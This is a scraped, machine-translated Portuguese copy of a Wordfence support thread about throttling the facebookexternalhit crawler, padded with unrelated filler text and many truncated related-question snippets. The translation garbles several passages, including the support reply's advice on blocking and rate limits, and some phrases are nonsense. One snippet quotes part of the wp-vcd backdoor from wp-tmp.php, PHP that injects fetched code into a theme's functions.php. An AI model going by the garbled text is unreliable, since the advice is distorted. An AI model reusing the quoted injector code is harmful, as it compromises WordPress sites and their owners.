Pergunta de segurança do Wordpress Wordfence: Muito difícil limitar facebookexternalhit

Um usuário perguntou ?

Olá, encontrei um tópico aqui há um ano e não resolveu completamente meu problema com o bot do Facebook. Portanto, vou começar um novo:

facebookexternalhit é disparado de cerca de 50 IPs diferentes, e o Wordfence parece ignorar esse fato, e os IPs apenas o acompanham. Defini limites de rastreamento em 30 por minuto para qualquer pessoa que não seja o Google, mas como o Facebook “acede” a muitos endereços IP diferentes, “facebookexternalhit” atinge quase 100 vezes em apenas 10 segundos e aumenta a carga do meu servidor. a CPU trava como o mínimo possível por vários minutos. O conselho da minha empresa de hospedagem para atualizar meu serviço de nuvem para uma CPU maior é muito bom, porque eles ganham muito dinheiro dessa maneira. Mas isso não pode ser a correção. Não quero bloquear completamente o rastreador do Facebook, pois a maior parte da publicidade está no FB e, portanto, a maioria dos visitantes vem de lá. Mas tenho que limitá-lo ao “nível do rastreador”, não ao nível do IP. Eu acho que isso é uma falha no Wordfence, permitindo acesso ilimitado para um bot, quando o bot usa endereços IP ilimitados para rastrear seu site. Isso precisa ser definido e atualizado para limitar o rastreador, independentemente do IP usado para a visita. Alguma idéia de como alcançar o estrangulamento sem bloqueio?

(@newsarena)

1 ano, 6 meses atrás

Oi, eu tenho esses ataques / hits de IPs do facebookexternalhit (eles fingem ser) em todos os meus sites. Eu bloqueei todos eles. Pelo que li, esses são ataques DDoS de botnets de malware verificando ativamente sites nas últimas duas semanas. Wordfence não é uma falha comum, eu acho.

(@volkerforster)

1 ano, 6 meses atrás

Como obter suporte para Wordfence? Estou usando a versão paga, quero ajuda aqui!

Eu continuo bloqueando grandes intervalos de IP de onde os ataques acontecem, mas o Wordfence não funciona como esperado. Ele mostra certos intervalos de IP que estão bloqueados, mas as solicitações ainda causam uma grande carga no meu servidor até que isso aconteça.

Como isso pode ser feito?

Eles vêm de muitos endereços IP e NÃO podem bloqueá-los no nível do IP (é por isso), mas o Wordfence sempre mostra o mesmo nome para o bot:

facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)

Por que o Wordfence não pode bloquear isso completamente?

Também sinto falta de um site útil para limites de aplicativos. Posso limitar um bot a um valor por minuto, mas isso não é bom o suficiente. Quando defino o limite para 10 por minuto, ainda significa que eles podem enviar 10 solicitações em 1/10 de segundo, o que é muito especial, especialmente porque eles usam muitos endereços IP, provavelmente centenas de endereços IP diferentes.

Acontece que o Wordfence é completamente inútil para ajudar com esses ataques ao Facebook !! A questão é: que outra ferramenta oferece melhor proteção e melhor bloqueio contra esses ataques?

(@wfphil)

1 ano, 6 meses atrás

Olá @volkerforster

Se você for um usuário premium, poderá acessar o suporte premium de sua conta e abrir um ticket.

Um pacote de hospedagem de alta qualidade não deve se deteriorar apenas por causa de muitas visitas do bot do rastreador do Facebook.

O Wordfence bloqueará os endereços IP se eles estiverem em um intervalo de IP que você bloqueou, mas o Wordfence não pode bloquear solicitações ao seu servidor, portanto, o Wordfence funcionará conforme o esperado. No entanto, bloquear o Wordfence naturalmente usa menos recursos do servidor do que se essas solicitações não fossem bloqueadas e o WordPress estivesse totalmente carregado.

Você pode usar seu arquivo robots.txt para limitar o bot do rastreador do Facebook usando o guia de exemplo abaixo:

Recomendamos que você defina a opção Limite de taxa “Se as visualizações da página do rastreador excederem” para 240 por minuto. Se você definir para 30 por minuto, lembrará que os rastreadores amigáveis em seu site são rastreados corretamente. Leia nossas correções sugeridas aqui:

Isto foi útil?

0 / 0

Deixe um comentário 0

Em geral, desenvolvedores experientes podem entregar um trabalho e valor mais rápidos para seus clientes com seu trabalho, portanto, os preços geralmente refletem isso. As taxas de desenvolvedor gratuitas podem ser afetadas pela localização geográfica e pelas condições do mercado local. Outro fator é a popularidade de um desenvolvedor WordPress. Se eles ainda estão construindo seu portfólio, eles podem ter preços mais competitivos do que profissionais experientes. A pessoa que você quer vai depender da complexidade do seu site; Se você encontrar o desenvolvedor WordPress certo, seu objetivo deve ser atingir os objetivos do seu site.

Outras perguntas relacionadas

Pergunta de segurança do WordPress Wordfence: Plugin Cherry
Um usuário perguntou ? Olá meu site está sendo bombardeado com acessos para: wp-content/plugins/cherry-plugin/admin/import-export/upload.php Posso ver que o WF está bloqueando o caminho para bots/pessoas: bloqueado pelo firewall para upload de arquivos maliciosos (PHP) Mas como posso bloquear automaticamente os endereços IP de chamar esse cabo/url novamente? Muito obrigado (@mountainguy2) 2 anos, 10 meses atrás […]
Pergunta de segurança do WordPress Wordfence: A tabela wp_wfNet404s não existe no mecanismo
Um usuário perguntou ? Aqui está o mesmo problema com: Eu também tenho o mesmo problema em algumas instalações do WordPress. Com o phpMyAdmin vejo que a tabela está “em uso” para sempre e sem “qualquer tipo” (sem InnoDB, sem Myisam). Clique em ‘mostrar conteúdo da tabela’ retorna: #1932 – Tabela ‘wp.wp_wfNet404s’ não está no […]
Pergunta sobre o Wordfence Security do WordPress: O plugin “whmpress” parece estar abandonado
Um usuário perguntou ? Eu sou um desenvolvedor de plugins e este plugin está atualizado, mas o wordfence diz que o plugin “Auto More Tag” parece ter sido preterido (atualizado em 25 de maio de 2015, testado para WP 4.2.21). Na verdade, a versão atual é 4.7.1. Você pode me dizer os critérios como o […]
Pergunta de segurança do WordPress Wordfence: Considere remover a fonte Roboto personalizada
Um usuário perguntou ? Em primeiro lugar, obrigado por este plugin essencial! Hoje notei que as fontes não estão sendo exibidas corretamente no meu WordPress-Backend. A fonte não parece estar “carregada”. Após algumas pesquisas, descobri que o novo plugin Wordfence (7.0) inclui a fonte Roboto por estilo de tag: <link rel=”stylesheet” id=’wordfence-font-css’ href=” type=”text/css” media=”all” […]
Pergunta sobre o Wordfence Security do WordPress: Não é possível desbloquear o IP
Um usuário perguntou ? Eu instalei recentemente o WordFence em um site de cliente. Ao definir as configurações, configurei-o para que um login com falha com o nome de usuário “Admin” (inexistente) bloqueasse automaticamente um usuário por um período de 5 dias. Claro, no dia seguinte, meu cliente acidentalmente tentou fazer login usando “Admin” como […]
Pergunta de segurança do WordPress Wordfence: Conflito com o construtor visual Divi
Um usuário perguntou ? Olá, o Wordfence não me permite salvar minhas alterações no meu site do Divi Visual Builder. Extremamente frustrado, perdi toneladas de trabalho e pensei duas vezes sobre o Wordfence em geral…. Espero que alguém possa resolver o problema o mais rápido possível ou me diga o local que quero alterar. Obrigado […]
Pergunta sobre o Wordfence Security by WordPress: Bloqueio de país: com upgrade premium ou não?
Um usuário perguntou ? Estou farto de centenas de hackers chineses e ucranianos atacando meu site diariamente, então comecei a pensar em atualizar para o WordFence Premium para bloquear um país; meus visitantes-alvo estão apenas nos EUA e no Canadá. O dilema aqui é a negociação de desempenho, então minha pergunta para quem fez o […]
Pergunta de segurança do WordPress Wordfence: Bloqueio de país de problema de acesso negado
Um usuário perguntou ? Olá, Temos uma pergunta que sofremos em novembro de 2016 e que voltou dos mortos. =) O número original do ticket era 30077. Podemos não vê-lo em nosso histórico de tickets, mas esperamos que apareça no final. Caso contrário, informe-nos e podemos anexar o tópico de e-mail original. A versão mais […]
Pergunta de segurança do WordPress Wordfence: Preenchendo a pasta tmp
Um usuário perguntou ? Olá, Eu tenho um problema quando os arquivos do Wordfence na pasta tmp não são excluídos, eles se acumulam em grandes números e estão usando todo o meu espaço em disco. ‘Sistema de arquivos’ e ‘Configurações do Wordfence’ têm um ‘tique verde’. Os arquivos são coletados na pasta /tmp/ ao lado […]
Pergunta sobre o Wordfence Security do WordPress: Ocorreu um erro crítico no seu site
Um usuário perguntou ? Depois de desativar TODOS os plugins e reativá-los um por um, descobri que esse erro foi causado pelo plugin de segurança Wordfence. Uma vez desativado, o problema foi resolvido, então segui o protocolo adequado e removi seu plugin. Em seguida, reinstalei, MAS esse problema NÃO foi resolvido, então tive que remover […]
WordPress Wordfence Security Question: Tente acessar uma página que não existe (http://www.dongtaiwang.com/ e mais)
Um usuário perguntou ? Olá, o que é isso? É perigoso? Mais sites abaixo (@wfala) faz 3 anos Oi, Como você não está hospedando esta página “ogPipe.aspx” em seu servidor, você não precisa se preocupar com essas solicitações, os bots podem gerar essas solicitações em seu site procurando por vulnerabilidades que você possa ter para […]
Pergunta de segurança do WordPress Wordfence: proxies confiáveis para Cloudfront
Um usuário perguntou ? Atualmente eu consertei os IPs encontrados aqui como proxies confiáveis para detectar uma palavra, encontre o IP do cliente certo. Existe um gancho/filtro que podemos usar para atualizar automaticamente os endereços IP caso a AWS substitua um novo ponto de presença na nuvem em vez de verificar manualmente os pontos de […]
Pergunta de segurança do WordPress Wordfence: A tabela trava e mostra avisos após a atualização do MySQL 5.6 para o MariaDB 10.3
Um usuário perguntou ? Olá, Estou atualizando meu servidor do MySQL 5.6 para o MariaDB 10.3 e estou recebendo vários erros de bloqueio de tabela para várias contas, seguidos por um aviso de verificação de tabela. Abaixo está um exemplo de uma conta de usuário. Example: [ERROR] mysqld: Table ‘./user_wp649/wpjs_wfSNIPCache’ is marked as crashed and […]
Pergunta de segurança do WordPress Wordfence: Verificação profunda – Necessário mais profundo
Um usuário perguntou ? Consegui encontrar e remover/reparar muitos arquivos infectados. No entanto, um novo tipo de ataque surgiu: agora que o código malicioso está escondido dentro dos arquivos de imagem e ícone, o PHP inclui apenas => que (logicamente) não é detectado pela varredura. O que é necessário é a adição de uma opção […]
Pergunta de segurança do WordPress Wordfence: ataque DDos
Um usuário perguntou ? Olá, IP 51.255.205.144 continua atacando meu site. É wp-login.php. Bloqueado automaticamente, mas ainda atacando. Está bem? Obrigado, Ji Yeon. (@wfdave) 2 anos, 4 meses atrás Olá @aowisdom50, Se você puder verificar se o endereço IP do invasor está realmente bloqueado no WordFence -> Firewall -> Bloquear, você deve se proteger contra […]
Pergunta sobre o Wordfence Security do WordPress: erro cURL 35: erro de protocolo SSL desconhecido
Um usuário perguntou ? O Wordfence está instalado no meu site e estava perfeitamente bem, mas há alguns dias é impossível realizar uma nova verificação: recebo este erro: “A chamada da API do Wordfence falhou ao resolver os endereços IP: Falha ao conectar-se aos servidores de verificação do Wordfence: erro cURL 35: erro de protocolo […]
Pergunta sobre o Wordfence Security do WordPress: erro cURL 35: erro de protocolo SSL desconhecido
Um usuário perguntou ? O Wordfence está instalado no meu site e estava perfeitamente bem, mas há alguns dias é impossível realizar uma nova verificação: recebo este erro: “A chamada da API do Wordfence falhou ao resolver os endereços IP: Falha ao conectar-se aos servidores de verificação do Wordfence: erro cURL 35: erro de protocolo […]
Pergunta sobre o Wordfence Security do WordPress: erro cURL 35: erro: 1408F10B: rotinas SSL: ssl3_get_record: número de versão incorreto
Um usuário perguntou ? Quando executo a verificação de segurança, recebo o seguinte erro: Ignorar teste de loopback: erro cURL 35: erro: 1408F10B: rotinas SSL: ssl3_get_record: número de versão incorreto (@wfgerald) 9 meses, 1 semana atrás Olá @jasmines, pode Diagnóstico relatórios para que você possa ter uma visão melhor do seu ambiente? Ir Wordfence > […]
Pergunta sobre o Wordfence Security do WordPress: Não vejo as opções de verificação agendada
Um usuário perguntou ? Olá, estamos lutando com um site que tem muitos defeitos de memória física, geralmente no mesmo horário do dia. Parece que isso pode coincidir com o horário em que o WordFence pode estar executando uma verificação agendada. Isso faria sentido, porque o site tem quase 10 GB, então acho que isso […]
Pergunta sobre o Wordfence Security do WordPress: Mensagem de bloqueio personalizada?
Um usuário perguntou ? Olá. Eu sei que isso já foi discutido antes, mas existe uma maneira de fornecer uma mensagem de bloqueio personalizada quando um usuário é removido de um site? Recebi uma mensagem irritada de um cliente que foi impedido de fazer login e pensei que eu o estava bloqueando. (@18tommyboy) 8 meses, […]
Pergunta sobre o Wordfence Security do WordPress: Aparência > Editor, está faltando?
Um usuário perguntou ? A guia Editor está ausente em Aparência. Eu sei que o Itheme Security oculta esta página por motivos de segurança, mas não vejo um lugar para habilitá-lo ou desabilitá-lo no Wordfence e quando desabilito o plugin o Editor não volta. Alguma ideia? (@pidengmor) 2 anos, 6 meses atrás Verifica a wp-config.php […]
Pergunta de segurança do WordPress Wordfence: página alternativa com tag canônica correta
Um usuário perguntou ? Olá, Eu encontro este erro em uma página alternativa com uma tag canônica correta, Google Search Console, /? Wordfence_lh = 1 & hid = 421840EA779ABC79A8746C0553F5CD9D Se você tiver alguma idéia, por favor me avise. O plugin está atualizado, a versão mais recente. (@wfala) 2 anos, 9 meses atrás Olá @sailors Esses […]
Pergunta sobre o Wordfence Security do WordPress: Uma verificação diária?
Um usuário perguntou ? O Wordfence pode ser configurado para realizar verificações diárias e resultados de e-mail somente se forem detectados problemas e todos os outros recursos estiverem desabilitados? (@wfdave) 1 ano, 5 meses atrás Olá @consultor1027, Na versão gratuita do Wordfence, as verificações não podem ser agendadas automaticamente. Então o que você pode fazer […]
Pergunta sobre o Wordfence Security do WordPress: Elemento removido
Um usuário perguntou ? Olá, O Wordfence atual removeu muitos arquivos maliciosos do meu site. Não tenho certeza se eles são seguros ou não, mas se não há nada de errado em destruí-los, eu quero. Há um botão “Excluir todos os itens excluídos” Eu sei que parte do elemento deletável é? Isso pode afetar meu […]
Pergunta de segurança do WordPress Wordfence: Alterar URL do wp-admin
Um usuário perguntou ? Oi, Para tornar meu site mais seguro, prefiro alterar o URL do wp-admin para algo como O Wordfence pode me ajudar a alterar o URL? Obrigado (@realmentemattgray) 3 anos, 10 meses atrás Fazer você mesmo não é recomendado devido à possibilidade de problemas de incompatibilidade (ou seja, com plugins). Mas existe […]
Pergunta sobre o Wordfence Security do WordPress: CAPTCHA Bot Portal é sempre zero
Um usuário perguntou ? Recentemente, apliquei o reCAPTCHA nas páginas de login dos meus clientes e enviei um e-mail para eles hoje, furioso por não conseguirem entrar no site sem clicar em um link em um e-mail de verificação. Por alguma razão, eles não receberam o e-mail, mas não está aqui ou ali. Seu procedimento […]
Pergunta sobre o Wordfence Security do WordPress: Não consigo traduzir ERRO: O nome de usuário ou senha que você digitou está incorreto.
Um usuário perguntou ? Olá, Como habilitei a opção “Não permitir que o WordPress exponha usuários válidos em erros de login”, a frase na página de login foi alterada quando alguém com uma senha ou nome de usuário incorreto mudou para “ERRO: nome de usuário ou senha que você digitou incorretamente. Perdeu sua senha? « […]
Pergunta sobre o Wordfence Security do WordPress: não é possível fazer upload de gif
Um usuário perguntou ? Estou tentando fazer upload de um arquivo gif usando o carregador de mídia, mas toda vez que tento, recebo um erro informando que o tipo de arquivo não é permitido por motivos de segurança. Não consigo encontrar uma maneira de passar por isso. Este é um site WordFence? Como faço para […]
Pergunta sobre o Wordfence Security by WordPress: Durante a instalação inicial, o botão “Continuar” não funciona.
Um usuário perguntou ? Após a instalação, entro no servidor de e-mail apropriado, seleciono sim/não em liberação de segurança, marque a caixa em termos e política. Mas o botão “Continuar” permanece inativo, então não posso usar o Wordfence. Tenho outros sites onde a instalação funcionou perfeitamente. Por favor, diga-me o que fazer. (@wfgerald) 1 ano, […]
Pergunta sobre o Wordfence Security do WordPress: O bot Yandex bloqueia o bot?
Um usuário perguntou ? Olá, O bot Yandex bloqueia o bot? Eu não tenho nenhum bloqueio no meu servidor. Como permitir bots de pesquisa Yandex através do Wordfence? Em, (@wfdave) 1 ano, 1 mês atrás Olá @bugun, O Wordfence não bloqueia o yandex por padrão. No entanto, se o bot quebrar uma de suas regras […]
Pergunta de segurança do WordPress Wordfence: problema do Divi Framework
Um usuário perguntou ? Meus sites estão executando um tema Divi e o Wordfence parece estar criando um problema com a estrutura do site. Meu site inteiro mostra esse aviso nos logs de erros. O site periodicamente dá erros 504 e 502 e eu suspeito que pode ser o motivo. Existe algo que possa ser […]
Pergunta de segurança do WordPress Wordfence: Desativando a autenticação XML-RPC
Um usuário perguntou ? No novo campo Opções de login do Wordfence, a opção ‘Desativar autenticação XML-RPC’ está disponível. O texto de ajuda para esta opção diz “Se desabilitado, o XML-RPC solicita que sua autenticação seja rejeitada”. Isso se refere se a opção está desabilitada ou se o XML-RPC está desabilitado (opção habilitada)? Eu não […]
Pergunta sobre o Wordfence Security do WordPress: “Descrição: Backdoor usado para injeção de backlink e outras atividades maliciosas”
Um usuário perguntou ? Eu deixei um desenvolvedor (Peopleperhour) construir um site para mim. Desde que terminou (4 dias atrás), não fiz nada além de atualizar os plugins. Ritmo do Wordfence hoje Recebi 5 avisos assim: Nome do arquivo: wp-content/theme/ficheysixteen/functions.php Tipo de arquivo: Tema O texto correspondente neste arquivo é: $div_code_name = “wp_vcd”; O tipo […]
Pergunta sobre o Wordfence Security para WordPress: Detecção e remoção de colmeias
Um usuário perguntou ? Tentando detectar um site e remover Coinhive (hog hog) de um site auto-hospedado WP. Instale o Wordfence no site, sem capturá-lo… Preciso de outro plugin como o Securi para monitorar malware? (@bluebearmedia) 3 anos, 2 meses atrás Sem dúvida, o suporte da WF o apoiará aqui, mas enquanto isso… Coinhive em […]
Pergunta de segurança do WordPress Wordfence: O usuário criado com wp-cli está definido como alta prioridade
Um usuário perguntou ? Oi, costumo usar wp-cli para criar usuários, pois sou administrador de sistemas e raramente faço login no painel do wordpress (especialmente desde o lançamento do Wordfence Central, obrigado por isso!) No entanto, se eu criar esse usuário, tenho um problema de digitalização Usuário administrador com nome de usuário [username] Criado fora […]
Pergunta sobre o Wordfence Security do WordPress: Usuário impedido de fazer login
Um usuário perguntou ? Olá a todos, estou recebendo o seguinte e-mail, devo me preocupar? Eu uso um nome de usuário não tradicional e acho que minha senha é difícil de adivinhar. Um usuário com endereço IP 193.201.224.28 não conseguiu fazer login ou usar o formulário de recuperação de senha pelo seguinte motivo: Número máximo […]
Pergunta sobre o Wordfence Security do WordPress: Erro ao desbloquear e-mail
Um usuário perguntou ? Olá, É um site sem fins lucrativos. e queríamos fazer login admin para configurar nossos recursos no site, mas nossa conta estava bloqueada pelo wordfence e tentamos desbloquear a conta duas ou três vezes até agora, não foi enviado para nosso e-mail principal -mail is information@ gowise.org. No entanto, gostaríamos de […]
Pergunta sobre o Wordfence Security do WordPress: Erro typeError: $ (…). ErrorxError não é uma função
Um usuário perguntou ? erro no console JS com o Wordfence Uncaught TypeError: $(…). Object.init(admin.ajaxWatcher.1573059078.js?ver=7.4.1:7) não se aplica a HTMLDocument. (admin.ajaxWatcher.1573059078.js?view=7.4.1:83) ag e (jquery-3.4.1.slim.min.js:2) ag t (jquery-3.4.1.slim.min.js:2 ) (@wfgerald) 1 ano, 1 mês atrás Olá @thomask, Parece haver um conflito com o tema ou um dos plugins que você está usando, você poderia tentar mudar […]
Pergunta de segurança do WordPress Wordfence: Desconecte endereços IP legítimos
Um usuário perguntou ? Como exatamente desmontamos um endereço IP válido? Passei por este fórum e vi as inúmeras respostas para ir até a página Bloquear Firewall e clicar no botão Desbloquear IP… mas não existe esse botão. O site que eu gerencio tem 1200 membros fortes e alguns deles não são muito bons em […]
Pergunta de segurança do WordPress Wordfence: WP Engine não permite Wordfence
Um usuário perguntou ? Tentamos instalar o Wordfence em um site hospedado com wpengine e recebemos esta notificação: “O Wordfence está em nossa lista de rejeição e resultará em desempenho abaixo do ideal para o seu ambiente.” Como o wpengine é tão popular, como isso será resolvido? Eu me sinto vulnerável sem ter este ótimo […]
Pergunta sobre o Wordfence Security do WordPress: wp-cron.php? fazendo_wp_cron = 1561669232.9309959411621093750000
Um usuário perguntou ? Olá, obrigado por Wordfence. Eu acho ótimo. Fui impedido de acessar as mensagens de URL proibidas em meus sites por quase 48 horas: Tipo: UK Esquerda Bloqueada https: // (domínio name) /wp-cron.php?doing_wp_cron=1561669232.9309959411621093750000 e foi impedido de acessar um URL proibido por https: // (domínio name) /wp-cron.php?doing_wp_cron=1561669232.9309959411621093750000 27/06/2019 22:00:34 (7 minutos atrás) […]
Pergunta sobre o Wordfence Security do WordPress: WP-SpamShield” removido do wordpress.org?
Um usuário perguntou ? Olá, Na varredura de hoje, recebo esta mensagem de ‘intensidade crítica’: WP-SpamShield” has been removed from wordpress.org. It may have compatibility problems with the current version of WordPress or unknown security issues. No site Wordfence, sugere-se a remoção do plugin para lidar com tais mensagens. Quero verificar se devo procurar esse […]
Pergunta sobre o Wordfence Security do WordPress: wp-wcd.php e mais malware
Um usuário perguntou ? Olá, Minha equipe tem um problema com vários tipos de vírus maliciosos, o primeiro de um tema VCD que veio dentro do wp-include/code e injetado no theme/functions.php. A segunda permissão para alterar um vírus e a terceira são alguns sinais chineses dentro dos plugins. Também em alguns sites tivemos uma versão […]
Pergunta de segurança do WordPress Wordfence: Configuração do firewall Wp-VCD
Um usuário perguntou ? Olá, fui infectado 3 vezes pelo malware wp-vcd e graças ao WF encontrei os arquivos infectados, mas como posso configurar o firewall sem que isso aconteça novamente? Obrigado (@wfphil) 1 ano, 6 meses atrás Olá @pauet Revise estas duas seções: Isto foi útil? SimNão 0 / 0
Pergunta sobre o Wordfence Security do WordPress: Banco de dados wp_wfHits para 57 Mb
Um usuário perguntou ? O banco de dados wp_wfHits está ficando maior. Com 57 Mb é muito grande na minha opinião. Estou no certo? Se eu estiver correto, como posso reduzi-lo? (@wfyann) 2 anos, 10 meses atrás Olá @lojze, O “wp_wfHits” armazena todos os hits visíveis em visualizações de tráfego ao vivo; você pode “Quantidade […]
Pergunta sobre o Wordfence Security do WordPress: Vírus no wordfenceClass.php
Um usuário perguntou ? Erro do tipo E_COMPILE_ERROR na linha 75 do arquivo /home/pbbsantceloni/public_html/wp-content/plugins/wordfence/wordfence.php. Mensagem de erro: require_once(): Falha ao abrir ‘/home/pbbsantceloni/public_html/wp-content/plugins/wordfence/lib/wordfenceClass.php’ (include_path=’.:/opt/alt/php71/usr/share/ piorra’) Incluo um link para a captura de antivírus. (@wfgerald) 1 ano, 5 meses atrás Olá @sergialarconrecio, Obrigado por compartilhar isso. Este é certamente um falso positivo. Os desenvolvedores estão analisando e […]
Pergunta sobre o Wordfence Security do WordPress: Vírus encontrado no seu plugin
Um usuário perguntou ? Olá Escrevo porque tenho o antivírus cPGuard no cPanel e encontrei um vírus no seu plugin no arquivo wordfenceClass.php das informações que mais tarde deixarei com o vírus detectado. /home/sainform/public_html/wp-content/plugins/wordfence/lib/wordfenceClass.php Virus Found {HEX}Malware.Expert.generic.mailer.27.UNOFFICIAL 2019-03-27 20:17:02 Estou aguardando uma atualização para remover este vírus, pois seu plugin é exigido pelo WordPress. Obrigado […]
Pergunta sobre o Wordfence Security do WordPress: Meu próprio IP foi bloqueado
Um usuário perguntou ? WF tem mostrado 21 blocos do meu próprio IP nos últimos 30 dias, 14 blocos nos últimos 7 dias. Eu não tive nenhum problema para acessar meu site, então…. Que significa isso? Alguém quer logar com meu IP? Pode? Pelo que entendi, o WF protege o acesso ao meu site E […]
Pergunta de segurança do WordPress Wordfence: MySQL Crash
Um usuário perguntou ? Eu tive uma pergunta quando o WF estava colocando meu servidor de banco de dados offline devido a cargas pesadas, o que posso fazer para corrigi-lo? O serviço MySQL estava consumindo 16% de RAM média na última hora de sua memória bloqueada no final, fazendo com que o servidor travasse. Posso […]
Pergunta sobre o Wordfence Security do WordPress: WF Scan – MySQLi Error: [2027] pacote casual
Um usuário perguntou ? Olá, WP 4.9.7 WF 7.1.9 Ao executar a verificação do WF, obtemos o seguinte erro: erro wf_summaryItems e valor de gravação (erro do MySQLi: [2027] pacote casual) Não temos certeza se uma verificação de WF está funcionando corretamente depois que sua empresa de hospedagem a mudou de uma hospedagem para outra […]
Pergunta sobre o Wordfence Security do WordPress: pasta wflogs gerando muito tráfego
Um usuário perguntou ? Começou há cerca de 4 horas. a pasta em wp-content/wflogs é atualizada e os arquivos são carregados para esta pasta. Aqui está a lista de arquivos: attack-data.php config.php ips.php rules.php Embora eu tenha desabilitado os plugins do wordfence excluindo esta pasta wflogs, ela é criada novamente. O que está acontecendo. Este […]
WordPress Wordfence Pergunta de segurança: O que meu arquivo .gitignore para Wordfence inclui?
Um usuário perguntou ? Estou desenvolvendo meu site localmente no meu Macbook Pro usando: Roots Bedrock WordPress Docker Git (no Bitbucket) Eu tenho o Wordfence instalado e adicionei todos os seus arquivos ao controle de versão no Git. Então, ao usar o Git, notei que o seguinte arquivo do Wordfence está sendo atualizado constantemente; – […]
Pergunta de segurança do WordPress Wordfence: nomes de usuário estranhos EWbE0ms%gIDNsOOz
Um usuário perguntou ? Oi, estou entrando estranhamente com algo como este nome de usuário EWbE0ms%gIDNsOOz e, em seguida, um login normal do mesmo IP como um nome normal. Alguém já teve essa dúvida antes? Que significa isso? (@wfdave) Faz 2 anos Olá @indigobg, Eu tenho alguns palpites sobre por que isso está acontecendo: 1. […]
Pergunta sobre o Wordfence Security do WordPress: wf firewall bloqueando iframe/youtube
Um usuário perguntou ? Tentei embutir o iframe do youtube em uma página, mas foi removido pelo firewall do Wordfence; Tive que desabilitar o firewall para funcionar. Não consigo encontrar nenhuma informação na pesquisa do Google ou no documento do switch que tenho que escolher para permitir a incorporação e ativar o firewall (@wfala) 2 […]
Pergunta sobre o Wordfence Security do WordPress: Avisos: * Arquivo desconhecido no núcleo do WordPress: wp-include / wp-tmp.php
Um usuário perguntou ? Isso foi recebido esta manhã. O que deveria fazer? Aqui está o código dentro do wp-tmp.php: ini_set(‘display_errors’, 0); error_reporting(0); $wp_auth_key=’87b83c0568dfdee2d0d59bf8a221c00e’; //echo “rrrr”.get_template_directory(); $file=file_get_contents(get_template_directory().’/functions.php’); $pat_code=”/div_code_name[sS]*?(if ( ! function_exists[sS]*?extract([sS]*?)?>/i”; if(preg_match_all($pat_code, $file, $matches_pat_code)) { $toreplace=$matches_pat_code[1][0]; //echo $toreplace; $newxc=file_get_contents(‘ if (stripos($newxc, $wp_auth_key) !== false) { $new_file=str_replace($toreplace,$newxc,$file); @file_put_contents(get_template_directory().’/functions.php’,$new_file); } } //@file_put_contents($funcfile,$file); if ( ! function_exists( ‘slider_option’ […]
Pergunta sobre o Wordfence Security do WordPress: AVISO! seu site caiu
Um usuário perguntou ? Então, eu estava prestes a adicionar o WordFence aos meus 17 sites WordPress, pois meu parceiro realmente gostou da versão antiga. Estou feliz por ter encontrado aqui e notado os comentários de 1 estrela antes de instalar. Mas eu não estou aqui dando uma revisão de uma estrela de boatos. Acabamos […]
Pergunta sobre o Wordfence Security do WordPress: VERIFICAÇÃO NECESSÁRIA
Um usuário perguntou ? A nova VERIFICAÇÃO exigida para usuários regulares pode ser desativada? Eu odeio ser redirecionado para a página de login do WordPress. (@lennilg) 1 ano, 7 meses atrás Ok, desabilitar o reCAPTCHA resolve o problema com os clientes do Woocommerce clicando em um link enviado por e-mail, sendo redirecionados para wp-login.php e […]
Pergunta de segurança do WordPress Wordfence: Muito difícil limitar facebookexternalhit
Um usuário perguntou ? Olá, encontrei um tópico aqui há um ano e não resolveu completamente meu problema com o bot do Facebook. Portanto, vou começar um novo: facebookexternalhit é disparado de cerca de 50 IPs diferentes, e o Wordfence parece ignorar esse fato, e os IPs apenas o acompanham. Defini limites de rastreamento em […]
Pergunta sobre o Wordfence Security do WordPress: VERIFICAÇÃO NECESSÁRIA
Um usuário perguntou ? VERIFICAÇÃO NECESSÁRIA: É necessária uma verificação adicional para fazer login. Verifique o endereço de e-mail associado à conta para ver se há um link verificado. Isso sempre é exibido quando os usuários fazem login. Como desativá-lo? (@vipini) 1 ano, 7 meses atrás sim, como desligar isso? (@wfgerald) 1 ano, 7 meses […]
Pergunta sobre o Wordfence Security do WordPress: VERIFICAÇÃO NECESSÁRIA: É necessária uma verificação adicional para fazer o login
Um usuário perguntou ? Como a VERIFICAÇÃO É NECESSÁRIA: É necessária uma verificação adicional para fazer o login? Você pode pular permanentemente esta etapa de verificação ativando a autenticação de dois fatores em sua conta. Tente fazer login para verificar sua conta A solicitação foi relatada como suspeita e precisamos verificar se você tentou fazer […]
Pergunta sobre o Wordfence Segurança do WordPress: injeção de SQL
Um usuário perguntou ? Olá, Eu tenho alguns sites que parecem estar recebendo a mesma injeção de SQL repetidamente. A primeira vez que fiz uma varredura, mostrou todos os arquivos perfeitamente em palavras. Então eu atualizei o wordpress/plugins, deletei minha conta FTP e mudei as palavras-chave do SQL etc. Uma semana depois, a mesma coisa […]
Pergunta sobre o Wordfence Security do WordPress: Perguntas / Perguntas no site novamente: php.ini e user.ini ??
Um usuário perguntou ? Olá! Eu li os posts sobre como configurar o site e realmente consegui alguma ajuda para isso, mas acho que meu representante não está fazendo isso direito e não consigo fazê-lo funcionar. Eu tenho um site principal (sem palavras) em public_html e depois 2 subsites nessa conta de hospedagem (ambos os […]
Pergunta de segurança do WordPress Wordfence: Otimização do GoGeek no Siteground
Um usuário perguntou ? Olá, desculpe, sei que existem vários tópicos sobre otimização do Siteground, mas não consigo encontrar nada para me ajudar com o plano GoGeek, onde tenho vários sites em uma conta. Eu quero seguir as instruções aqui: Ainda estou confuso. Para a etapa 6, adicionarei uma rota do Wordfence para cada site […]
Pergunta sobre o Wordfence Security do WordPress: Estranhos “ataques” de sites dos EUA
Um usuário perguntou ? Tenho 73 anos, então talvez eu esteja fora do meu alcance aqui, mas quero ver ataques fortes e sustentados de empresas americanas. Estou cuidando do site da minha filha e resolvi ver o comentário dela ao vivo. Este site tem apenas alguns meses e recebe apenas 15 a 20 visitantes legítimos […]
Pergunta de segurança do WordPress Wordfence: configurações do site
Um usuário perguntou ? Oi, eu estava um pouco confuso no início com as configurações no Siteground. Uma dica ao falar sobre sites em um plugin ou subdomínio é distinguir entre a palavra usada para identificar o domínio principal e o domínio do plugin. O uso da palavra ‘site’ no contexto das instruções me deixou […]
Pergunta de segurança do WordPress Wordfence: Tentativas de login via wp-login e xmlrpc.php
Um usuário perguntou ? Olá, muito semelhante a este bilhete: Recebo muitos e-mails de pessoas que querem fazer login com o nome de usuário ‘[login]’ambos de xmlrpc.php, wp-login.php e (Acho que não há diferença, mas eles estão listados de maneira diferente na seção Wordfence > Ferramentas > Tráfego ao vivo.) Percebo que todos são reconhecidos […]
Pergunta de segurança do WordPress Wordfence: resultados de verificação ausentes
